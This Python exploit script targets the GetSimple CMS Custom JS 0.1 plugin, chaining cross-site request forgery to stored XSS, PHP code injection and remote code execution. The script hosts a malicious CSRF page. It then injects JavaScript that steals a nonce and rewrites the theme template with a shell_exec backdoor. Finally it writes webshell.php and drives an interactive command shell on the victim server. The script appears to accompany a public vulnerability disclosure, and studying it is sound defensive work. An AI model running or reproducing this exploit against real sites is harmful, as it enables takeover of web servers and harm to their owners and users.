
# Exploit Title: GetSimple CMS Custom JS 0.1 - CSRF to XSS to RCE
|
|
# Exploit Author: Bobby Cooke (boku) & Abhishek Joshi
|
|
# Date: 30/04/201
|
|
# Vendor Homepage: http://get-simple.info
|
|
# Software Link: http://get-simple.info/download/ & http://get-simple.info/extend/plugin/custom-js/1267/
|
|
# Vendor: 4Enzo
|
|
# Version: v0.1
|
|
# Tested against Server Host: Windows 10 Pro + XAMPP (note: the webshell-upload command in tryUploadWebshell uses cmd.exe `^` escaping, so as written the final stage is Windows-specific)
|
|
# Tested against Client Browsers: Firefox (Linux & Windows) & Internet Explorer
|
|
# Vulnerability Description:
|
|
# The Custom JS v0.1 plugin for GetSimple CMS suffers from a Cross-Site Request Forgery (CSRF) vulnerability in its settings form (/admin/load.php?id=CustomJSPlugin): a remote, unauthenticated attacker can make an authenticated administrator's browser store arbitrary JavaScript in the plugin. That JavaScript later runs in the administrator's browser, fetches the CSRF nonce from /admin/theme-edit.php and rewrites the theme template with PHP, which results in Remote Code Execution (RCE) on the hosting server. The only interaction required is that a logged-in administrator visits a malicious third-party website and subsequently views a page of the CMS.
|
|
# Full Disclosure & MITRE CVE Tracking: github.com/boku7/gsCMS-CustomJS-Csrf2Xss2Rce
|
|
# CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
|
|
# CVSS Base Score: 9.6
|
|
|
|
import argparse
import html
from http.server import BaseHTTPRequestHandler, HTTPServer
from threading import Thread
from time import sleep

import requests
from colorama import (Fore as F, Back as B, Style as S)
|
|
# Short aliases for the colorama escape sequences used in the banner, prompt
# and status strings.  Bound one per line so the mapping is explicit.
# FT resets the foreground colour only; ST resets all styling.
# NOTE: ``S`` (colorama Style) is rebound to the HTTP handler class further
# down this file, so only the ST/SD/SB aliases captured here are safe to use
# after that point.
FT = F.RESET
FR = F.RED
FG = F.GREEN
FY = F.YELLOW
FB = F.BLUE
FM = F.MAGENTA
FC = F.CYAN
ST = S.RESET_ALL
SD = S.DIM
SB = S.BRIGHT
def bullet(char, color):
    """Return a bright, colour-bracketed status prefix such as ``[-] ``.

    ``color`` picks the bracket colour: ``'B'`` blue, ``'R'`` red, anything
    else green.  ``char`` is rendered bright in the default colour between
    the brackets, and a single trailing space separates the prefix from the
    message.  Escape sequences come from the module-level colorama aliases.
    """
    bracket_colors = {'B': FB, 'R': FR}
    bracket = bracket_colors.get(color, FG)
    opening = SB + bracket + '[' + ST
    closing = SB + bracket + ']' + ST
    return opening + SB + char + closing + ' '
# Status-line prefixes used by the server thread and the webshell loop:
# info = blue "[-]", err = red "[-]", ok = green "[!]" (any colour code other
# than 'B'/'R' falls through to green in bullet()).
info = bullet('-', 'B')
err = bullet('-', 'R')
ok = bullet('!', 'G')
class theTHREADER(object):
    """Start the CSRF-hosting HTTP server on a background daemon thread.

    Instantiating the class is the whole API: ``__init__`` spawns a daemon
    thread that executes :meth:`run`, which simply calls the module-level
    ``run()`` server loop.  Because the thread is a daemon, the server dies
    together with the main thread (the interactive webshell loop) instead of
    keeping the process alive after Ctrl-C.
    """

    def __init__(self, interval=1):
        # ``interval`` is retained for interface compatibility; nothing in
        # this file reads it.
        self.interval = interval
        worker = Thread(target=self.run, args=(), daemon=True)
        worker.start()

    def run(self):
        # The bare name resolves to the module-level run() (the HTTP server
        # loop), not to this method.
        run()
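def webshell(target):
    """Interactive command loop against ``<target>/webshell.php``.

    Each line typed at the prompt is POSTed as the ``FierceGodKick`` form
    field (the second-stage shell runs it through ``shell_exec``) and the raw
    response body is printed.  Ctrl-C or EOF at the prompt ends the session;
    a transport error or a 4xx/5xx status is reported and the prompt returns,
    instead of the original bare ``except: pass`` silently ending the shell.

    ``target`` is the base URL (scheme + host, no trailing slash).  Returns
    None.  The original also passed the unused module global ``page`` to
    ``format``; it was ignored and has been dropped.
    """
    websh = "{}/webshell.php".format(target)
    term = "{}{}PWNSHELL{} > {}".format(SB, FR, FB, ST)
    welcome = ' {}{}]{}+++{}[{}========>{} HelloFriend {}<========{}]{}+++{}[{}'.format(SB, FY, FR, FY, FT, FR, FT, FY, FR, FY, ST)
    print(welcome)
    while True:
        try:
            specialmove = input(term)
        except (KeyboardInterrupt, EOFError):
            print()
            return
        command = {'FierceGodKick': specialmove}
        try:
            # verify=False: the target's TLS certificate is deliberately not
            # checked (self-signed lab hosts).  No timeout on purpose: the
            # remote command may legitimately run for a while.
            r = requests.post(websh, data=command, verify=False)
            if r.status_code != 200:
                r.raise_for_status()
        except requests.RequestException as exc:
            print("{}webshell request failed: {}".format(err, exc))
            continue
        print(r.text)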
def xhrRcePayload():
    """Return the JavaScript stage that the CSRF stores in the Custom JS plugin.

    When an administrator later loads a CMS page, this script GETs
    ``/admin/theme-edit.php`` as an HTML document, lifts the CSRF ``nonce``
    and the currently edited file name from the returned form, and POSTs them
    back with the template body replaced by
    ``<?php echo shell_exec($_REQUEST[solarflare]) ?>``.  That turns the
    rendered theme page into a blind command-execution primitive.

    Construction notes:
    * ``<`` and ``>`` are produced at runtime via ``decodeURIComponent`` so the
      literal angle brackets never appear in the stored script (presumably to
      survive the plugin's storage/output path -- not verified here).  The
      helper names are swapped (``gt`` actually holds ``<``); harmless, and
      kept verbatim because this string *is* the payload.
    * ``r.forms[1][2].defaultValue`` depends on the position of the file
      selector in theme-edit.php's second form; another CMS version may break it.
    """
    stages = [
        'var e=function(i){return encodeURIComponent(i);};',
        'var gt = decodeURIComponent("%3c");',
        'var lt = decodeURIComponent("%3e");',
        'var h="application/x-www-form-urlencoded";',
        'var u="/admin/theme-edit.php";',
        'var xhr1=new XMLHttpRequest();',
        'var xhr2=new XMLHttpRequest();',
        # Callback: once the editor page has loaded, submit the poisoned template.
        'xhr1.onreadystatechange=function(){',
        'if(xhr1.readyState==4 && xhr1.status==200){',
        'r=this.responseXML;',
        'nVal=r.querySelector("#nonce").value;',
        'eVal=r.forms[1][2].defaultValue;',
        'xhr2.open("POST",u,true);',
        'xhr2.setRequestHeader("Content-Type",h);',
        'payload=e(gt+"?php echo shell_exec($_REQUEST[solarflare]) ?"+lt);',
        'params="nonce="+nVal+"&content="+payload+"&edited_file="+eVal+"&submitsave=Save+Changes";',
        'xhr2.send(params);',
        '}};',
        # Kick off the first request; responseType=document gives us a DOM to query.
        'xhr1.open("GET",u,true);',
        'xhr1.responseType="document";',
        'xhr1.send();',
    ]
    return ''.join(stages)
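def csrfPayload(site=None, js=None):
    """Return the HTML page that performs the CSRF against the plugin settings.

    The page holds a POST form aimed at ``/admin/load.php?id=CustomJSPlugin``
    with the XHR stage from ``xhrRcePayload()`` in the ``customjs_js_content``
    field; an administrator who submits it while logged in stores that
    JavaScript in the plugin.  As in the original, the form is submitted by a
    button click rather than automatically.

    Both parameters default to the original behaviour: ``site`` falls back to
    the module-level ``target`` and ``js`` to ``xhrRcePayload()``.  They exist
    so the page can be built (and tested) without touching module globals.

    Fix: the JavaScript is HTML-escaped before being placed inside the
    ``value="..."`` attribute.  It contains double quotes, which in a
    double-quoted attribute end the value early and truncate the stored
    payload.  Browsers decode the entities before submitting the form, so the
    server still receives the raw script.
    """
    base = target if site is None else site
    script = xhrRcePayload() if js is None else js
    action = html.escape(base, quote=True) + '/admin/load.php?id=CustomJSPlugin'
    fields = [
        ('customjs_url_content', ''),
        ('customjs_js_content', html.escape(script, quote=True)),
        ('submit', 'Save Settings'),
    ]
    inputs = ''.join(
        '<input type="hidden" name="{}" value="{}">'.format(name, value)
        for name, value in fields
    )
    return (
        '<html><body>'
        '<form action="' + action + '" method="POST">'
        + inputs
        + '<input type="submit" value="Submit request">'
        '</form></body></html>'
    )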
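class S(BaseHTTPRequestHandler):
    """Request handler that serves the CSRF page to whoever connects.

    Every GET, whatever the path, is answered with ``csrfPayload()``.  The
    class name shadows the colorama ``Style`` alias imported as ``S``; the
    ``ST``/``SD``/``SB`` aliases were captured before this rebinding, so the
    rest of the file is unaffected, but ``S`` must not be used for styling
    below this point.
    """

    def do_GET(self):
        # Show the operator who connected (ip:port), then hand over the form.
        ip, port = self.client_address[0], self.client_address[1]
        victim = "{}:{}".format(ip, port)
        print("{}{} connected to Malicious CSRF Site!".format(ok, victim))
        print('{}Waiting for admin to view a CMS webpage & trigger the XSS XHR -> RCE payload..'.format(info))
        body = csrfPayload().encode('utf-8')
        # Fix: the original wrote the body with no status line or headers at
        # all.  Browsers that refuse such HTTP/0.9-style replies drop the
        # page, so send a proper 200 with content type and length first.
        self.send_response(200)
        self.send_header('Content-Type', 'text/html; charset=utf-8')
        self.send_header('Content-Length', str(len(body)))
        self.end_headers()
        self.wfile.write(body)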
def run(server_class=HTTPServer, handler_class=S, port=80):
    """Serve the CSRF page on ``port`` (all interfaces) until Ctrl-C.

    ``server_class`` and ``handler_class`` default to the stdlib server and
    the ``S`` handler above.  Binding port 80 needs elevated privileges.
    Blocks inside ``serve_forever``; a KeyboardInterrupt ends the loop, after
    which the listening socket is closed and a shutdown message printed.
    Any other exception propagates.  Normally started on a daemon thread by
    ``theTHREADER``.
    """
    bind_address = ('', port)
    httpd = server_class(bind_address, handler_class)
    print('{}Hosting CSRF attack & listening for admin to connect..'.format(info))
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        pass  # Ctrl-C is the expected way to stop; fall through to cleanup.
    httpd.server_close()
    print('Stopping httpd...')
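def tryUploadWebshell(target, page, *, windows=True):
    """Fire one attempt to turn the blind PHP stage into a real webshell.

    Once the admin's browser has run the XHR stage, the theme template on the
    target contains ``shell_exec($_REQUEST[solarflare])``.  This POSTs a
    ``solarflare`` command to ``target + page`` that writes ``webshell.php``
    (``shell_exec($_REQUEST['FierceGodKick'])``) into the PHP process's
    working directory, which is where ``checkWebshell`` and ``webshell``
    expect to find it.

    ``windows`` (keyword-only, default True = original behaviour) selects
    cmd.exe quoting: ``^`` escapes ``<``/``>`` so they land in the file
    instead of being parsed as redirections.  Pass ``windows=False`` for a
    /bin/sh target, where single quotes do the same job.

    Request failures are swallowed on purpose: the caller polls with
    ``checkWebshell`` and retries, so a failed attempt just means "not yet".
    """
    if windows:
        # The ^ symbols are required to escape the <> symbols to create the non-blind webshell (^ is an escape for window cmd prompt)
        cmd = "echo ^<?php echo shell_exec($_REQUEST['FierceGodKick']) ?^>>webshell.php"
    else:
        # POSIX sh: single quotes keep <, > and $ literal; PHP accepts the
        # double-quoted array key.
        cmd = "echo '<?php echo shell_exec($_REQUEST[\"FierceGodKick\"]) ?>' > webshell.php"
    try:
        # verify=False: target TLS certificate deliberately not checked.
        requests.post(url=target + page, data={'solarflare': cmd}, verify=False, timeout=30)
    except requests.RequestException:
        pass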
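def checkWebshell(target):
    """Probe ``<target>/webshell.php`` and return its HTTP status, or None.

    POSTs a harmless ``FierceGodKick`` value; a 200 means the second-stage
    shell is in place (the entry point polls this until it is).  Any request
    error -- connection refused, timeout, missing scheme in ``target`` --
    yields None instead of raising, which the caller's ``!= 200`` test treats
    as "not there yet".  A timeout is set so a hung target cannot stall the
    polling loop forever.
    """
    websh = "{}/webshell.php".format(target)
    capsule = {'FierceGodKick': 'pwnt?'}
    try:
        # verify=False: target TLS certificate deliberately not checked.
        resp = requests.post(url=websh, data=capsule, verify=False, timeout=10)
    except requests.RequestException:
        return None
    return resp.status_code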
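def sig():
    """Return the colorama-styled ASCII-art author banner as one string.

    Pure string assembly from the module-level colour aliases; printed once
    by the entry point after argument parsing.  The only code change from
    the original is in the fourth row: a lone backslash before a space was an
    invalid escape sequence (a SyntaxWarning on current Pythons, slated to
    become an error) that happened to render as a literal backslash.  It is
    now a doubled backslash, which renders identically without the warning.
    The art's internal spacing may have been collapsed by page extraction --
    the rows are reproduced as found.
    """
    SIG = SB+FY+" .-----.._ ,--. "+FB+" ___ "+FY+" ___ _____ _____ _ _ _____ \n"
    SIG += FY+" | .. > ___ | | .--. "+FB+" / \\ "+FY+" |_ | _ / ___| | | |_ _| \n"
    SIG += FY+" | |.' ,'-'"+FR+"* *"+FY+"'-. |/ /__ __ "+FB+" \\ O / "+FY+" | | | | \\ `--.| |_| | | | \n"
    SIG += FY+" | </ "+FR+"* * *"+FY+" \\ / \\/ \\ "+FB+" / _ \\/\\ "+FY+" | | | | |`--. \\ _ | | | \n"
    SIG += FY+" | |> ) "+FR+" * *"+FY+" / \\ \\"+FB+" ( (_> < "+FY+"/\\__/ | \\_/ /\\__/ / | | |_| |_ \n"
    SIG += FY+" |____..- '-.._..-'_|\\___|._..\\___\\ "+FB+"\\___/\\/"+FY+" \\____/ \\___/\\____/\\_| |_/\\___/\n"
    SIG += FY+" __"+FR+"linkedin.com/in/bobby-cooke/"+FY+"_____ "+" __"+FR+"linkedin.com/in/reverse-shell/"+FY+"\n"+ST
    return SIG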
def argsetup():
    """Parse the two positional CLI arguments and return the namespace.

    ``Target``: base address of the GetSimple CMS install.  It is used
    verbatim as a URL prefix for ``requests``, so it must include the scheme
    (the help text's "domain name" understates this).  ``PublicPage``: path
    of a public page rendered with the CMS theme -- the page whose template
    receives the injected PHP.  Description and help strings carry colorama
    styling, hence ``RawTextHelpFormatter`` so argparse leaves them alone.
    """
    summary = (
        SB + FB
        + ' The Custom JS v0.1 plugin for GetSimple CMS suffers from a Cross-Site Request Forgery (CSRF) attack that allows remote unauthenticated attackers to inject arbitrary client-side code into authenticated administrators browsers, which results in Remote Code Execution (RCE) on the hosting server, when an authenticated administrator visits a malicious third party website.\n'
        + ST
    )
    score = (
        SB + FC + ' CVSS Base Score' + FT + ':' + FR + ' 9.6 ' + FT + '|'
        + FC + ' CVSS v3.1 Vector' + FT + ':' + FR + ' AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H' + FC
    )
    parser = argparse.ArgumentParser(
        description=summary + score,
        formatter_class=argparse.RawTextHelpFormatter,
    )
    target_help = ST + FC + 'Routable domain name of the target GetSimple CMS instance' + SB
    page_help = ST + FC + 'Path to the public page which implements the CMS theme' + ST
    parser.add_argument('Target', type=str, help=target_help)
    parser.add_argument('PublicPage', type=str, help=page_help)
    return parser.parse_args()
if __name__ == '__main__':
    # Banner: tool name, the attack chain, and credits.
    header = SB + FR + ' GetSimple CMS - Custom JS Plugin Exploit\n'
    header += SB + FB + ' CSRF ' + FT + '->' + FB + ' Stored XSS ' + FT + '->' + FB + ' XHR PHP Code Injection ' + FT + '->' + FB + ' RCE\n' + ST
    header += SB + FT + ' ' + FR + ' Bobby ' + FR + '"' + FR + 'boku' + FR + '"' + FR + ' Cooke & Abhishek Joshi\n' + ST
    print(header)

    args = argsetup()
    # Module globals: csrfPayload() reads ``target`` when building the form.
    target = args.Target
    page = args.PublicPage
    print(sig())

    # Serve the CSRF page on port 80 from a background daemon thread.
    theTHREADER()

    # Poll until the admin has triggered the chain and webshell.php answers
    # 200.  Each round re-sends the blind "write webshell.php" command, which
    # has no visible effect until the PHP stage is actually in the template.
    pwnt = checkWebshell(target)
    while pwnt != 200:
        sleep(3)
        tryUploadWebshell(target, page)
        sleep(2)
        pwnt = checkWebshell(target)

    print("{} A wild webshell appears!".format(ok))
    webshell(target)